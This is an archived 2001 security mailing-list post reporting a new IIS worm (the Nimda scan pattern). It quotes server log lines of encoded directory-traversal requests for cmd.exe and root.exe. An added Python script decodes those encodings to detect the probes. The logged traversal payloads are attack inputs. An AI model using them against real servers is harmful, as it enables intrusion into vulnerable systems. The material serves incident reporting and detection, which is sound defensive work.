I picked up our first occurrences of this on 9/18/2001 at 8:29:27 central. The attempts were from the same Class A address space, until 9/18/2001 at 10:12:52 central.

-----Original Message-----
From: Cory McIntire [mailto:coryat_private]
Sent: Tuesday, September 18, 2001 9:43 AM
To: forensicsat_private
Subject: New Worm ?

Hello,

I and a few others I know are getting bombarded on our machines with IIS requests.... looks like another worm, and it's much smarter than before; it seems to stay within the same class A and sometimes the same class B as the attacking machine is in.

Here is an excerpt of what I believe is the full scan....

204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:14 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:22 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

Just thought I would let you guys know... this one looks bad, fella..... thank god for apache..... that is, of course, if there isn't a huge bog down on the net.... =[

cory

-----------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
-----------------------------------------------------------------
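The probe sequence quoted above (the IIS scan pattern of the worm later named Nimda) is easy to miss with a naive string match, because the same request is sent under several encodings: double percent-encoding (%255c, %%35%63, %25%35%63, %252f) and two-byte overlong or malformed UTF-8 sequences (%c0%af, %c0%2f, %c1%9c, %c1%1c) that a lenient decoder turns back into "/" or "\". The following detection script is an added example and is not part of the post or of any SecurityFocus tooling. It normalises each request path the way such a lenient decoder would, flags the cmd.exe / root.exe / traversal indicators, and groups hits by source /8 relative to the server's own address so the "stays within the same class A" observation can be checked. The log lines in SAMPLE_LOG are constructed (modelled on the excerpt, with one benign request and one probe from a different /8 added), and the server address 204.120.1.1 is hypothetical.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample log (Apache common/combined format), modelled on the
# excerpt in the post; the 204.120.70.8 and 10.1.2.3 lines are invented.
SAMPLE_LOG = """\
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.120.70.8 - - [18/Sep/2001:09:40:01 -0500] "GET /index.html HTTP/1.0" 200 1532 "-" "Mozilla/4.0"
10.1.2.3 - - [18/Sep/2001:09:41:07 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
"""

# Common log format: ip ident user [timestamp] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Two-byte sequences with a 0xC0/0xC1 lead byte. A strict decoder rejects
# them; a lenient one yields ((lead & 0x1f) << 6) | (cont & 0x3f), which is
# how %c0%af and %c0%2f become "/" and %c1%9c and %c1%1c become "\".
OVERLONG = re.compile(r'%(c[01])%([0-9a-f]{2})', re.I)


def normalize_path(path: str) -> str:
    """Decode a request path the way a lenient server would, so the probe
    pattern is visible regardless of the encoding the worm chose."""
    path = OVERLONG.sub(
        lambda m: chr(((int(m.group(1), 16) & 0x1F) << 6)
                      | (int(m.group(2), 16) & 0x3F)),
        path,
    )
    # Percent-decode until stable: %255c -> %5c -> "\", %%35%63 -> %5c -> "\",
    # %252f -> %2f -> "/". Capped so a hostile input cannot loop forever.
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Treat backslash like slash and squeeze repeated separators.
    return re.sub(r'/+', '/', path.replace('\\', '/'))


def indicators(norm_path: str) -> list:
    """Return the probe indicators present in an already-normalised path."""
    p = norm_path.lower()
    found = []
    if '/../' in p:
        found.append('traversal')
    if 'cmd.exe' in p:
        found.append('cmd.exe')
    if 'root.exe' in p:
        found.append('root.exe')
    return found


def scan(log_text: str, server_ip: str) -> dict:
    """Parse log lines, keep the probe requests, and group them by source /8
    (the post's "Class A") relative to the server's own /8."""
    server_a = server_ip.split('.')[0]
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                     # skip lines that are not CLF
        norm = normalize_path(m['path'])
        ind = indicators(norm)
        if ind:
            hits.append({'ip': m['ip'], 'ts': m['ts'],
                         'status': int(m['status']),
                         'path': norm, 'indicators': ind})
    by_class_a = Counter(h['ip'].split('.')[0] for h in hits)
    same = sum(1 for h in hits if h['ip'].split('.')[0] == server_a)
    return {'hits': hits, 'by_class_a': by_class_a, 'same_class_a': same}


if __name__ == '__main__':
    result = scan(SAMPLE_LOG, '204.120.1.1')   # hypothetical address of our server
    for h in result['hits']:
        print(f"{h['ip']:15} {h['ts']} {h['status']} "
              f"{','.join(h['indicators']):18} {h['path']}")
    print('hits by source /8:', dict(result['by_class_a']))
    print('hits from our own /8:', result['same_class_a'], 'of', len(result['hits']))
```

Note that the 400 responses in the excerpt (the %%35%63 and %%35c variants) are still counted as hits: the status code tells you how your server answered, not whether a probe was attempted, so the detection keys on the decoded path alone. Matching on the normalised form also means a rule written for %255c does not go quiet when the next variant switches to %c0%af.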
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 10:04:57 PDT